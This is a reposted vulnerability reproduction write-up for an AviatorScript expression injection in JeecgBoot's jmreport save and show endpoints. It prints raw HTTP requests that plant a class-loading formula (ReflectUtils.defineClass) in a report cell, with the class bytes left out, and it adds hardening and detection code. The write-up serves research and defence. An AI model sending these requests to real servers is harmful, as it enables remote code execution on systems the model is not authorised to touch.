JeecgBoot AviatorScript Expression Injection Vulnerability Reproduction

Published by admin on 8 August 2024 at 13:52:22; 330 views; 3,936 characters; reading time about 13 minutes.


Preface

Many researchers have recently published partial or full details of the JeecgBoot AviatorScript expression injection, so I am adding my own write-up. It is best read together with "[Code Audit] Analysis of the latest jeecg-boot permission bypass vulnerability and a newly discovered bypass".

Code Analysis

A quick walk through the relevant code.

Start with the /jeecg-boot/jmreport/save endpoint.


The request is handled by saveReport.


The save endpoint essentially just processes and persists the submitted JSON report definition; nothing is evaluated at this stage. The expression injection itself is triggered by the show endpoint, which renders the stored report.



Following the call into ExpressUtil, we find AviatorEvaluator being used to evaluate cell expressions.


Continuing down the call path reaches the trigger point: the cell text stored via save is passed to the AviatorScript evaluator without restriction.

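The sink pattern described above, side by side with a hardened evaluator configuration, as an added example. This is not JeecgBoot or AviatorScript project code; the class, method and variable names are assumptions, and the only project facts it relies on are that the cell formula text reaches AviatorEvaluator and that the payload uses a `use` import plus a static `ReflectUtils.defineClass` call.

```java
// Added example (not JeecgBoot or AviatorScript project code). It reproduces the
// sink pattern seen in ExpressUtil: a report cell's formula text is handed to
// AviatorEvaluator with default options, so "use" imports and static method
// calls such as ReflectUtils.defineClass(...) are reachable. The hardened
// variant uses a dedicated evaluator with a minimal feature set and an empty
// class allow-list. Method and variable names here are assumptions.
import com.googlecode.aviator.AviatorEvaluator;
import com.googlecode.aviator.AviatorEvaluatorInstance;
import com.googlecode.aviator.Feature;
import com.googlecode.aviator.Options;
import com.googlecode.aviator.exception.ExpressionRuntimeException;

import java.util.Collections;
import java.util.HashMap;
import java.util.Map;

public class CellExpressionDemo {

    static String stripFormulaMarker(String cellText) {
        // Cell formulas in the write-up start with "=", as in "=(use ...)".
        return cellText.startsWith("=") ? cellText.substring(1) : cellText;
    }

    // Vulnerable pattern: untrusted cell text goes into the shared global
    // evaluator, whose defaults enable every language feature and let an
    // expression reference any class on the classpath.
    static Object evaluateUnsafe(String cellText, Map<String, Object> ctx) {
        return AviatorEvaluator.execute(stripFormulaMarker(cellText), ctx);
    }

    // Hardened pattern: a private instance restricted to what a report formula
    // needs. Without Feature.Use the parser rejects "use" statements; with an
    // empty ALLOWED_CLASS_SET no class can be named from an expression
    // (AviatorScript treats the default null as "all classes allowed" and an
    // explicit set as the whitelist).
    static final AviatorEvaluatorInstance SAFE = buildSafeEvaluator();

    static AviatorEvaluatorInstance buildSafeEvaluator() {
        AviatorEvaluatorInstance inst = AviatorEvaluator.newInstance();
        inst.setOption(Options.FEATURE_SET,
                Feature.asSet(Feature.If, Feature.StringInterpolation));
        inst.setOption(Options.ALLOWED_CLASS_SET, Collections.<Class<?>>emptySet());
        inst.setOption(Options.MAX_LOOP_COUNT, 1000);
        return inst;
    }

    static Object evaluateSafe(String cellText, Map<String, Object> ctx) {
        return SAFE.execute(stripFormulaMarker(cellText), ctx);
    }

    public static void main(String[] args) {
        Map<String, Object> ctx = new HashMap<>();
        ctx.put("price", 12.5);
        ctx.put("qty", 4L);

        // An ordinary report formula evaluates normally in the hardened instance.
        System.out.println(evaluateSafe("=price * qty", ctx));

        // The payload shape from the write-up, with the class bytes left out.
        String payload = "=(use org.springframework.cglib.core.*;"
                + "ReflectUtils.defineClass('test', nil, ClassLoader.getSystemClassLoader());)";
        try {
            evaluateSafe(payload, ctx);
            System.out.println("payload was NOT rejected");
        } catch (ExpressionRuntimeException e) {
            // Rejected at compile time: "use" is an unsupported feature in this
            // instance, so the expression never reaches class lookup or loading.
            System.out.println("rejected: " + e.getMessage());
        }
    }
}
```

Turning off `Feature.Use` on its own is not enough, because a class can still be written fully qualified inside the expression; the empty allow-list is what closes that path. The fix in an application like JeecgBoot also has to cover every place ExpressUtil hands user-stored text to the evaluator, not just one call site.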

Vulnerability Reproduction

1. Save a report definition whose cell text carries the AviatorScript expression (the base64-encoded class bytes are elided in the original):

POST /jeecg-boot/jmreport/save?previousPage=xxx&jmLink=YWFhfHxiYmI=&token=123 HTTP/1.1
Host: 192.168.37.1:8088
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: application/json, text/plain, */*
Content-Type: application/json
Content-Length: 3456

{
    "loopBlockList": [],
    "area": false,
    "printElWidth": 718,
    "excel_config_id": "980882669965455363",
    "printElHeight": 1047,
    "rows": {
        "4": {
            "cells": {
                "4": {
                    "text": "=(use org.springframework.cglib.core.*;use org.springframework.util.*;ReflectUtils.defineClass('test', Base64Utils.decodeFromString('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'), ClassLoader.getSystemClassLoader());)",
                    "style": 0
                }
            },
            "height": 25
        },
        "len": 96,
        "-1": {
            "cells": {
                "-1": {
                    "text": "${gongsi.id}"
                }
            },
            "isDrag": true
        }
    },
    "dbexps": [],
    "toolPrintSizeObj": {
        "printType": "A4",
        "widthPx": 718,
        "heightPx": 1047
    },
    "dicts": [],
    "freeze": "A1",
    "dataRectWidth": 701,
    "background": false,
    "name": "sheet1",
    "autofilter": {},
    "styles": [
        {
            "align": "center"
        }
    ],
    "validations": [],
    "cols": {
        "4": {
            "width": 95
        },
        "len": 50
    },
    "merges": [
        "E4:F4",
        "B4:B5",
        "C4:C5",
        "D4:D5",
        "G4:G5",
        "H4:H5",
        "I4:I5",
        "D1:G1",
        "H3:I3"
    ]
}


2. Render the saved report through the show endpoint, which evaluates the stored cell expression:

POST /jeecg-boot/jmreport/show?previousPage=xxx&jmLink=YWFhfHxiYmI= HTTP/1.1
Host: 192.168.37.1:8088
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: application/json, text/plain, */*
Content-Type: application/json
Content-Length: 42

{
    "id": "980882669965455363"
}

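A defender-side counterpart to the two-step reproduction above, as an added example that is not JeecgBoot code: a scanner over the report definition JSON that /jmreport/save persists (the same shape as the request body in step 1), flagging formula cells that carry the building blocks of the class-loading payload. It uses Jackson, which Spring Boot applications already ship; the token list, the class and method names, and the convention that formula cells begin with "=" (inferred from the payload) are assumptions.

```java
// Added example (not JeecgBoot project code). Walks rows.*.cells.*.text in a
// saved report definition and reports formula cells that contain a "use"
// import, reflection or class-loader calls, or a fully qualified JVM package
// reference, none of which belong in a spreadsheet formula. Names and the
// suspicious-token list are assumptions; the sample JSON is constructed.
import com.fasterxml.jackson.databind.JsonNode;
import com.fasterxml.jackson.databind.ObjectMapper;

import java.util.ArrayList;
import java.util.Iterator;
import java.util.List;
import java.util.Map;
import java.util.regex.Pattern;

public class ReportCellScanner {

    static final Pattern SUSPICIOUS = Pattern.compile(
            "\\buse\\s+[\\w.*]+"                 // AviatorScript module import
            + "|defineClass|ClassLoader|forName" // class loading / reflection
            + "|\\b(java|javax|org|com|sun)\\.[a-z]+\\.", // fully qualified package
            Pattern.CASE_INSENSITIVE);

    public static final class Finding {
        public final String sheet, row, col, text;

        Finding(String sheet, String row, String col, String text) {
            this.sheet = sheet; this.row = row; this.col = col; this.text = text;
        }

        @Override
        public String toString() {
            return "sheet=" + sheet + " row=" + row + " col=" + col + " text=" + text;
        }
    }

    public static List<Finding> scan(String reportJson) throws Exception {
        JsonNode root = new ObjectMapper().readTree(reportJson);
        List<Finding> out = new ArrayList<>();
        String sheet = root.path("name").asText("?");
        // "rows" mixes row objects with scalar keys such as "len"; path() on a
        // scalar yields a missing node whose fields() iterator is empty.
        Iterator<Map.Entry<String, JsonNode>> rows = root.path("rows").fields();
        while (rows.hasNext()) {
            Map.Entry<String, JsonNode> row = rows.next();
            Iterator<Map.Entry<String, JsonNode>> cells = row.getValue().path("cells").fields();
            while (cells.hasNext()) {
                Map.Entry<String, JsonNode> cell = cells.next();
                String text = cell.getValue().path("text").asText("");
                // Only text beginning with "=" is treated as a formula.
                if (text.startsWith("=") && SUSPICIOUS.matcher(text).find()) {
                    out.add(new Finding(sheet, row.getKey(), cell.getKey(), text));
                }
            }
        }
        return out;
    }

    public static void main(String[] args) throws Exception {
        // Constructed sample, reduced from the save request above: one
        // malicious formula, one benign formula, one placeholder cell.
        String sample = "{\"name\":\"sheet1\",\"rows\":{"
                + "\"4\":{\"cells\":{"
                + "\"4\":{\"text\":\"=(use org.springframework.cglib.core.*;"
                + "ReflectUtils.defineClass('test', nil, ClassLoader.getSystemClassLoader());)\"},"
                + "\"5\":{\"text\":\"=price*qty\"}}},"
                + "\"-1\":{\"cells\":{\"-1\":{\"text\":\"${gongsi.id}\"}}},"
                + "\"len\":96}}";
        for (Finding f : scan(sample)) {
            System.out.println(f);
        }
    }
}
```

Run against the report table or against the save request body at a WAF or audit hook, this gives a reviewable list of cells rather than a blanket block; a match on the sample prints exactly the malicious cell at row 4, column 4.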

References

https://github.com/jeecgboot/JeecgBoot/issues/7014

https://github.com/killme2008/aviatorscript/issues/421

https://whoopsunix.com/docs/java/Expression/Aviator/#jdk-%E9%AB%98%E7%89%88%E6%9C%AC%E7%9A%84-aviator-%E8%A1%A8%E8%BE%BE%E5%BC%8F%E6%B3%A8%E5%85%A5



Originally published on the WeChat official account 良月安全: [Vulnerability Reproduction] JeecgBoot AviatorScript Expression Injection Vulnerability Reproduction

Disclaimer: the programs (methods) described in this article may be offensive in nature and are provided solely for security research and teaching. Readers who put this information to any other use bear full legal and joint liability; this site accepts none. For questions, contact us by e-mail (preferably from a corporate or otherwise valid mailbox so the message is not filtered; contact details are on the home page).
Source (CN-SEC, with thanks to the original author; please keep this link when reposting): https://cn-sec.com/archives/3045519.html
